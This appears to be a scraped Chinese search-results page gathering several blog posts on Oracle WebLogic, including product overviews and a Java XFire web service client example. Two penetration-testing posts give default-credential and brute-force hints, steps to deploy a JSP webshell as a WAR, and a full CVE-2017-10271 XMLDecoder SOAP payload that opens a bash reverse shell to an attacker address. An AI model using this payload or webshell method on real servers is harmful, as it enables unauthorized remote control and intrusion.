精华内容
下载资源
问答
  • 内网渗透-weblogic中间件系列漏洞

    千次阅读 2019-01-25 16:23:45
    WebLogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...

    weblogic

    WebLogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

     

    (1)WebLogic常用端口7001/7002,常见漏洞有弱口令导致上传任意war包、SSRF漏洞和反序列化漏洞

    访问:

    http://192.168.232.137:7001/console

    会跳转到管理员登录页面:

    http://192.168.232.137:7001/console/login/LoginForm.jsp

    常见默认帐户密码为weblogic。根据个人设置而已。完整爆破脚本git地址https://github.com/b4zinga/Explib/blob/master/weblogic.py

    (2)

    登陆weblogic后台 http://IP:7001/console ,点击左侧的部署,在弹出来的右侧页面点击“安装”

    在安装页面选择“上载文件”:

    在 “将部署上载到管理服务器” 区域选择"浏览",然后按照提示(其实就是一直下一步就行,最后点保存),将打包好的包含大马的war包上传至服务器。

    包含大马的war包制作方法:

    jar -cvf test.war ./test/*

    将test目录打包为test.war

    安装JDK

    小马放在JDK_HOME/bin目录下,cmd进入JDK_HOME/bin目录,运行"jar cvf shell.war mytest.jsp",生成shell.war小马文件

    上传成功后即可访问大马 http://192.168.136.130:7001/test/jsp马.jsp查看上传结果(需要注意的是,安装之后应该启动才能访问到该应用)

    (3)weblogic反序列化漏洞

    基于Weblogic t3协议引起远程代码执行的反序列化漏洞全家福(年代久远的就不再考究了):

    CVE-2015-4852

    CVE-2016-0638

    CVE-2016-3510

    CVE-2017-3248

    CVE-2018-2628

    基于wls-wsat服务组件的引起远程代码执行的反序列化漏洞:

    CVE-2017-3506

    CVE-2017-10271

    展开全文
  • 2019独角兽企业重金招聘Python工程师标准>>> ...

    1.在Maximo工程中创建com.test.webservice包。

    2.保存将http://test:8080/test/services/updateOrderItemImpl?wsdl文件保存到src根目录中。

    3.将web service 接口类放入com.test.webservice包中。

    package com.test.webservice;
    
    import javax.jws.WebMethod;
    import javax.jws.WebParam;
    import javax.jws.WebResult;
    import javax.jws.WebService;
    import javax.jws.soap.SOAPBinding;
    
    @WebService(name = "UpdateOrderItem", targetNamespace = "http://webservice.test.com/")
    @SOAPBinding(use = SOAPBinding.Use.LITERAL, parameterStyle = SOAPBinding.ParameterStyle.WRAPPED)
    public interface UpdateOrderItem {
    
    	@WebMethod(operationName = "upOrderItem", action = "")
    	@WebResult(name = "return", targetNamespace = "")
    	public boolean upOrderItem(
    			@WebParam(name = "id", targetNamespace = "http://webservice.test.com/") String id,
    			@WebParam(name = "status", targetNamespace = "http://webservice.test.com/") String status,
    			@WebParam(name = "owner", targetNamespace = "http://webservice.test.com/") String owner,
    			@WebParam(name = "ownergroup", targetNamespace = "http://webservice.test.com/") String ownergroup);
    
    }

    4.编写客户端调用程序。

    package com.test.webservice;
    
    import java.io.IOException;
    
    import org.codehaus.xfire.client.Client;
    import org.springframework.core.io.ClassPathResource;
    import org.springframework.core.io.Resource;
    
    public class TestClient {
    
    	/**
    	 * @param args
    	 * @throws Exception 
    	 * @throws IOException 
    	 */
    	public static void main(String[] args){
    		Object [] results = new TestClient().testClientMode("06ff91203759e0d4013759e98700001a", "status", "owner", "ownergroup");
            System.out.println( " result:  "   +  results[ 0 ]);
    	}
    	
    	public Object[] testClientMode(String id ,String status,String owner,String ownerGroup){
    		String wsdl = "updateOrderItemImpl.xml" ;  // 对应的WSDL文件 
            Resource resource  =   new  ClassPathResource(wsdl); 
            Client client = null;
    		try {
    			client = new  Client(resource.getInputStream(),  null );
    		} catch (IOException e) {
    			// TODO Auto-generated catch block
    			e.printStackTrace();
    		} catch (Exception e) {
    			// TODO Auto-generated catch block
    			e.printStackTrace();
    		}  // 根据WSDL创建客户实例 
            Object[] objArray  =   new  Object[4];
            objArray[0]  = id;
            objArray[1]  = status;
            objArray[2]  = owner;
            objArray[3]  = ownerGroup;
             // 调用特定的Web Service方法 
            Object[] results = null;
    		try {
    			results = client.invoke( "upOrderItem" , objArray);
    		} catch (Exception e) {
    			// TODO Auto-generated catch block
    			e.printStackTrace();
    		}
            return results;
    	}
    
    }

    5.在Maximo工程中添加XFire的支持。

    6.在Maximo 需要调用接口的代码中加入调用方法。

    /**
    		 * 2012-5-18 jxd	保存服务请求时判断是否是Portal提交的请求,如果是再判断Owner,OwnerGroup,Status是否发生变化,
    		 * 					如果发生变化调用Porta接口,同步更新数据。
    		 */
    		
    		if (getBoolean("MEP_PORTAL_SUBMIT")){
    			if (getBoolean("MEP_PORTAL_ISNEW")){
    				setValue("MEP_PORTAL_ISNEW", false,NOACCESSCHECK | NOVALIDATION_AND_NOACTION);
    			} else if (isModified("OWNER") || isModified("OWNERGROUP") || isModified("STATUS")) {
    				Object [] object = new TestClient().testClientMode(getString("MEP_PORTAL_ORDERITEMID"), getString("STATUS"), getString("OWNER"), getString("OWNERGROUP"));
    				System.out.println(object[0]+"------------------");
    			}
    		}

    7.将XFire的支持jar文件加入Weblogic的启动目录中,D:\bea\user_projects\domains\base_domain\lib。放入Maximo lib目录中有问题,总是提示找不到XFire的相关jar文件。

    XFire所需支持

    8.启动Weblogic,测试通过。

    以上为本人亲测,没有任何问题,如有其他好的方法,大家可以一起讨论交流。

    转载于:https://my.oschina.net/gsdrerk/blog/58037

    展开全文
  • 中间件漏洞-weblogic

    2019-10-07 16:03:36
    确切的说是一个基于javaee架构的中间件weblogic是用于开发、集成、部署和管理大型分布式web应用、网络应用和数据库应用的java应用服务器,将java的动态功能和java enterprise标准的安全性引入大型网络应用的开发、...

    漏洞简介:

    weblogic是美国Oracle公司出品的一个applicationserver。确切的说是一个基于javaee架构的中间件,weblogic是用于开发、集成、部署和管理大型分布式web应用、网络应用和数据库应用的java应用服务器,将java的动态功能和java enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中

    反序列化漏洞

    cve2017-10271复现:

    Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271),Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

    还是vulhub的环境,我们cd /vulhub/weblogic进到cve2017-10217目录下启动测试环境:

    docker-compose up -d

    等待一段时间,访问http://you ip :7001/即可看到一个404界面。说明weblogic已成功启动

    我们首先在地址栏加上如下一串路径:/wls-wsat/CoordinatorPortType

    如果显示如下,则表示存在漏洞:

    那我们可以burp抓取一个这个页面的数据包

    然后构造一个如下的数据包发送

    POST /wls-wsat/CoordinatorPortType HTTP/1.1
    Host: your-ip:7001
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: text/xml
    Content-Length: 633
    //这是注释,不必复制
    //下面是恶意代码块,其中构造了反弹shell
    //上面的content-type是必须要设置为text/html
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java version="1.4.0" class="java.beans.XMLDecoder">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>/bin/bash</string>
    </void>
    <void index="1">
    <string>-c</string>
    </void>
    <void index="2">
    <string>bash -i &gt;&amp; /dev/tcp/youip/port 0&gt;&amp;1</string>
    </void>
    </array>
    <void method="start"/></void>
    </java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>

    本地nc监听先监听着,然后静等反弹shell吧

    以下是必须的:

    content-type:text/html

    然后反弹成功,如果失败,可以尝试更换端口

    war后门部署

    得到登录口令后,上传war包:

    制作war包,将准备好的jsp大马保存为zip格式,然后重命名为war即可

    1:点击部署

    2:选择安装

    3:点击上传文件,上传准备好的war包

    上传成功:

    继续点击下一步:

    然后访问根据路径访问大马文件:

    /test/xxx.jsp?o=admin

    ssrf:待更新

    任意文件上传:待更新

    展开全文
  • 将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 BEA WebLogic Server拥有处理关键Web应用系统问题所需的性能、可扩展性和高可用性。 与BEAWebLogic Commerce ...

    1、简介

    1. BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应 用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
    2. BEA WebLogic Server拥有处理关键Web应用系统问题所需的性能、可扩展性和高可用性。 与BEAWebLogic Commerce ServerTM配合使用,BEA WebLogic Server可为部署适应性个性化电子商务应用系统提供完善的解决方案。

    2、概念

    1. BEA WebLogic Server具有开发和部署关键任务电子商务Web应用系统所需的多种特色和优势,包括:

    2.1、领先的标准

    1. 对业内多种标准的全面支持,包括EJB、JSB、JMS、JDBC、XML和WML,使Web应用系统的实施更为简单,并且保护了投资,同时也使基于标准的解决方案的开发更加简便。

    2.2、无限的可扩展性

    1. BEA WebLogic Server以其高扩展的架构体系闻名于业内,包括客户机连接的共享、资源 pooling以及动态网页和EJB组件群集。

    2.3、快速开发

    1. 凭借对EJB和JSP的支持,以及BEA WebLogic Server 的Servlet组件架构体系,可加速投 放市场速度。这些开放性标准与WebGain Studio配合时,可简化开发,并可发挥已有的技能,迅速部署应用系统。

    2.4、部署更趋灵活

    1. BEA WebLogic Server的特点是与领先数据库、操作系统和Web服务器紧密集成。

    2.5、关键任务可靠性

    1. 其容错、系统管理和安全性能已经在全球数以千记的关键任务环境中得以验证。

    2.6、体系结构

    1. BEA WebLogic Server是专门为企业电子商务应用系统开发的。企业电子商务应用系统需要快速开发,并要求服务器端组件具有良好的灵活性和安全性,同时还要支持关键任务所必需的扩展、性能、和高可用性。BEA WebLogic Server简化了可移植及可扩展的应用系统的开发,并为其它应用系统和系统提供了丰富的互操作性。凭借其出色的群集技术,BEA WebLogic Server拥有最高水平的可扩展性和可用性。BEA WebLogicServer既实现了网页群集,也实现了EJB组件群集,而且不需要任何专门的硬件或操作系统支持。网页群集可以实现透明的复制、负载平衡以及表示内容容错,如Web购物车;组件群集则处理复杂的复制、负载平衡和EJB组件容错,以及状态对象(如EJB实体)的恢复。无论是网页群集,还是组件群集,对于电子商务解决方案所要求的可扩展性和可用性都是至关重要的。共享的客户机/服务器和数据库连接以及数据缓存和EJB都增强了性能表现。这是其它Web应用系统所不具备的。
    2. WebLogic 应用服务器有如下几个基本概念:
    3. Domain: 域是个逻辑概念,用来组织管理一系列的应用服务器实例,也就是下面要解释的server. 域是WebLogic应用服务器中最大的概念,WebLogic应用服务器启动的时候就是以某个域来启动的,它有一个中心配置文件叫config.xml.
    4. A domain is the basic administration unit for WebLogic Server instances (servers) that is represented in
    5. its own configuration file (config.xml). A domain consists of one or more servers (and their associated
    6. resources) that you manage with a single Administration Server.
    7. Cluster: 族也是一个逻辑概念,用来分组用途相同的服务器实例,一个域中可以有多个族。
    8. A cluster is a deployment in which multiple WebLogic Server instances (servers) run simultaneously and
    9. work together to provide increased scalability and reliability. A cluster appears to clients to be a single
    10. WebLogic Server instance. The servers that constitute a cluster can run on the same machine, or be
    11. located on different machines.
    12. Machine: 机器是物理上的概念,代表一台运行WebLogic应用服务器的实在的机器,包括其IP地址等信息。一个域中可以包括多台机器。(同一台机器可以属于不同的域吗?)
    13. A machine is the logical representation of the computer that hosts one or more WebLogic Server
    14. instances (servers). WebLogic Server uses configured machine names to determine the optimum server
    15. in a cluster to which certain tasks, such as HTTP session replication, are delegated. The Administration
    16. Server uses the machine definition in conjunction with the Node Manager application to start remote
    17. servers.
    18. Server: 服务器,也就是一个应用服务器的实例,用来部署和运行各种J2EE应用程序,也可以来配置各种服务程序。它是WebLogic应用服务器的基本服务单元。一个WebLogic域中一般有一个管理服务器和多个被管理服务器。也就是下面我们要谈到的两个概念。
    19. A server is an instance of WebLogic Server that runs in its own Java Virtual Machine (JVM) and has its
    20. own configuration. Each WebLogic Server domain must have one server that acts as the Administration
    21. Server. In a typical production environment, the Administration Server is where the Administration
    22. Console is run and used to perform administrative tasks. By default, the Administration Server is called
    23. myserver. A typical production environment may also have one or more Managed Servers, which are
    24. instances of WebLogic Server used to host enterprise applications.
    25. Administrative Server: 管理服务器是用来管理配置域的中心点,一般来说,管理服务器上是不部署应用程序的,而是用来统一管理、配置、监控被管理服务器以及部署应用程序到被管理服务器上。一个域中有一台管理服务器。
    26. Managed Server: 被管理服务器是用来部署运行各种应用程序的。一个域中有一台或多台被管理服务器。
    27. Node Manager: 节点管理器是一个单独运行的后台程序,一般运行在被管理服务器的机器上,用来提供远程启动和停止服务器(Server)的功能。

    3、友情链接:

    http://www.360doc.com/content/12/0714/13/9629506_224153651.shtml

    展开全文
  • JMS(JavaMessagingService)是Java平台上有关面向消息中间件的技术规范,它便于消息系统中的Java应用程序进行消息交换,并且通过提供标准的产生、发送、接收消息的接口简化企业应用的开发,翻译为Java消息服务。...
  • 什么是WebLogicWebLogic是美商Oracle的主要产品之一,是并购BEA得来,WebLogic是一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络...
  • WebLogic

    2020-09-02 12:39:02
    WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • weblogic

    2016-12-30 13:57:05
    确切的说是一个基于JAVA EE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发...
  • WebLogic 12.1.3

    2018-07-23 10:40:29
    WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • WebLogic服务器

    2018-11-30 17:35:00
    WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 ...
  • weblogic详解

    2020-03-17 15:48:00
    一、简介WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。...
  • WebLogic介绍

    千次阅读 2019-01-31 11:14:36
    WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • 安装 weblogic

    2019-03-05 01:59:10
    WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • Weblogic漏洞

    2018-04-27 10:53:00
    WeblogicWebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。...
  • weblogic 安装

    2018-01-06 01:35:00
    WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • weblogic是Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和...
  • Weblogic 视频教程免费下载

    千次阅读 2018-10-19 13:55:28
    WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • weblogic服务器

    2014-02-19 10:43:18
    server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型...
  • 0x01 Weblogic简介1.1 叙述Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的...

空空如也

空空如也

1 2 3 4 5 ... 9
收藏数 166
精华内容 66
关键字:

weblogic中间件标准